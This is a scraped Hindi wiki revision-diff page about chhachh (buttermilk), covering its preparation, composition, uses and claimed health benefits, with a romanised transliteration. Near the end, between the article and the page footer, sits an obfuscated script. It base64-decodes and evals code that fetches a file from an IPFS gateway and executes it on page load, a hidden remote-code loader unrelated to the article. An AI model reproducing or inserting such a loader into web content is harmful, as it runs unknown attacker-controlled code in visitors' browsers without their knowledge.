Difference between revisions of "छाछ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ते है।" to "ते हैं।")
Line 1: Line 1:
 
[[चित्र:Buttermilk.jpg|thumb|छाछ<br />Buttermilk]]
 
[[चित्र:Buttermilk.jpg|thumb|छाछ<br />Buttermilk]]
*मूलत:मक्खन को मथकर [[वसा]] निकालने के बाद बचे हुये तरल पदार्थ को छाछ कहते है। आजकल इसका आशय पतला किए गए और मथे हुए दही से है, जिसका इस्तेमाल समूचे दक्षिण [[एशिया]] में एक शीतल पेय [[पदार्थ]] के रूप में किया जाता है।  
+
*मूलत:मक्खन को मथकर [[वसा]] निकालने के बाद बचे हुये तरल पदार्थ को छाछ कहते हैं। आजकल इसका आशय पतला किए गए और मथे हुए दही से है, जिसका इस्तेमाल समूचे दक्षिण [[एशिया]] में एक शीतल पेय [[पदार्थ]] के रूप में किया जाता है।  
 
*मलाई उतरे हुए [[दूध]] की ही तरह संवर्द्धित छाछ मुख्य रूप से पानी (लगभग 90 प्रतिशत), दुग्ध शर्करा लैक्टोज़ (लगभग 5 प्रतिशत) और [[प्रोटीन]] केसीन (लगभग 3प्रतिशत) से बनी होती है।
 
*मलाई उतरे हुए [[दूध]] की ही तरह संवर्द्धित छाछ मुख्य रूप से पानी (लगभग 90 प्रतिशत), दुग्ध शर्करा लैक्टोज़ (लगभग 5 प्रतिशत) और [[प्रोटीन]] केसीन (लगभग 3प्रतिशत) से बनी होती है।
 
*कम वसा के दूध की बनी हुई छाछ में भी घी अल्प मात्रा (2 प्रतिशत) में होता है। कम वसा और वसारहित दोनों प्रकार की छाछ में [[जीवाणु]] कुछ लैक्टोज़ को लैक्टिक अम्ल में बदलते हैं, जो दूध को खट्टा सा स्वाद दे देता है और लैक्टोज़ के [[पाचन]] में मदद करता है,  
 
*कम वसा के दूध की बनी हुई छाछ में भी घी अल्प मात्रा (2 प्रतिशत) में होता है। कम वसा और वसारहित दोनों प्रकार की छाछ में [[जीवाणु]] कुछ लैक्टोज़ को लैक्टिक अम्ल में बदलते हैं, जो दूध को खट्टा सा स्वाद दे देता है और लैक्टोज़ के [[पाचन]] में मदद करता है,  
 
*समझा जाता है कि जीवित जीवाणु की अधिक संख्या अन्य स्वास्थ्यवर्द्धक और पाचन संबंधी लाभ भी देती है ।
 
*समझा जाता है कि जीवित जीवाणु की अधिक संख्या अन्य स्वास्थ्यवर्द्धक और पाचन संबंधी लाभ भी देती है ।
 
*पश्चिम में पुडिंग और [[आइसक्रीम]] जैसे ठंडे मीठे व्यंजन उद्योग में उपयोग के लिए छाछ को गाढ़ा किया या सुखाया जाता है। विभिन्न भारतीय भाषाओं में इसे मठ्ठा और मोरू कहा जाता है।  
 
*पश्चिम में पुडिंग और [[आइसक्रीम]] जैसे ठंडे मीठे व्यंजन उद्योग में उपयोग के लिए छाछ को गाढ़ा किया या सुखाया जाता है। विभिन्न भारतीय भाषाओं में इसे मठ्ठा और मोरू कहा जाता है।  
*छाछ प्रायः [[गाय]], भैस के दूध से जमी दही को फेटकर बनता है। इस शीतल पेय पदार्थ को लोग मट्ठा के नाम से जानते है।
+
*छाछ प्रायः [[गाय]], भैस के दूध से जमी दही को फेटकर बनता है। इस शीतल पेय पदार्थ को लोग मट्ठा के नाम से जानते हैं।
 
*ताजा मट्ठा पीने से शरीर में पोषक तत्वों की पूर्ति होती है। तथा यह शरीर के लिए स्वास्थ्य वर्धक है।  
 
*ताजा मट्ठा पीने से शरीर में पोषक तत्वों की पूर्ति होती है। तथा यह शरीर के लिए स्वास्थ्य वर्धक है।  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 08:17, 20 February 2011

thumb|chhachh
Buttermilk

  • moolat:makkhan ko mathakar vasa nikalane ke bad bache huye taral padarth ko chhachh kahate haian. ajakal isaka ashay patala kie ge aur mathe hue dahi se hai, jisaka istemal samooche dakshin eshiya mean ek shital pey padarth ke roop mean kiya jata hai.
  • malaee utare hue doodh ki hi tarah sanvarddhit chhachh mukhy roop se pani (lagabhag 90 pratishat), dugdh sharkara laiktoz (lagabhag 5 pratishat) aur protin kesin (lagabhag 3pratishat) se bani hoti hai.
  • kam vasa ke doodh ki bani huee chhachh mean bhi ghi alp matra (2 pratishat) mean hota hai. kam vasa aur vasarahit donoan prakar ki chhachh mean jivanu kuchh laiktoz ko laiktik aml mean badalate haian, jo doodh ko khatta sa svad de deta hai aur laiktoz ke pachan mean madad karata hai,
  • samajha jata hai ki jivit jivanu ki adhik sankhya any svasthyavarddhak aur pachan sanbandhi labh bhi deti hai .
  • pashchim mean pudiang aur aisakrim jaise thande mithe vyanjan udyog mean upayog ke lie chhachh ko gadha kiya ya sukhaya jata hai. vibhinn bharatiy bhashaoan mean ise maththa aur moroo kaha jata hai.
  • chhachh prayah gay, bhais ke doodh se jami dahi ko phetakar banata hai. is shital pey padarth ko log mattha ke nam se janate haian.
  • taja mattha pine se sharir mean poshak tatvoan ki poorti hoti hai. tatha yah sharir ke lie svasthy vardhak hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh